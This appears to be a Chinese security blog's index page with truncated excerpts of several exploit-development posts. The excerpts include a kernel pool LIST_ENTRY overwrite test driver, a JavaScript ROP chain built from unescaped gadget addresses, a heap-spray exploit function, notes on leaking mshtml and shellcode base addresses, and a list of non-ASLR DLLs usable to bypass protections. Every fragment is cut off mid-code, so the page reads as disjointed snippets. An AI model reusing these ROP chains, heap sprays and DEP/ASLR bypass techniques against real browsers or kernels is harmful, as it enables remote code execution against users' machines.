爱杀之爪的矩阵

KERNEL POOL LISTENTRY OVERWRITE ATTACK     LIST_ENTRY OVERWRITE 原理图   测试代码: Sys： VOID Nopagepool_ListEntry_Overwrite(ULONGcbin,ULONG cout,UCHAR * InputBuffer) { PVOIDpatdbuffer=NULL,p

function getddd() { var kkkkk = unescape("\u0433\u77bf"); kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn kkkkk += unescape("\uf519\u77be")////pop ecx,retn kkkkk += unescape("\u9ef8\u1009

这几天调试发现一个奇怪的现象，一个在数据区段执行的指令，在开启了系统dep时 竟然还可以继续执行，换成其他指令就不可以，而且执行时这个内存属性仍旧是不可 执行属性。同时按理指令是一条一条执行，但是这个指令的执行是跳跃了，瞬间差点毁了 多年的指令执行三观。 debug win7+system dep open Breakpoint 0 hit eax=2e81e

见 链接   http://www.binvul.com/viewthread.php?tid=240&extra=page%3D1

alert("begin") //var div_container = document.getElementById("test"); //div_container.style.cssText = "display:none"; var cloned = new Array(); var selob = document.createElement("select"); selob.w0

leak mshtml base address  leak shellcode base address 其中leak shellcode base 思路是联合 http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003

DpoFeedb.dll        指纹识别 现在买的笔记本都有 MSCOMCTL.OCX 需要用户点一次允许 之后就不需要了 VBE7INTL.DLL    未找到加载方式 迅雷                 mcvcr71.dll java6                 mcvcr71.dll comct232.ocx      需要用户点一次允许 之后就不需要了 com

采用inking 大牛的方法 function exploit() { obj = document.getElementById('oo').object; var src = unescape("%u0c0c%u0c0c"); while (src.length < 0x1002) src += src; src = "\\\\xxx" + src; src = src.subs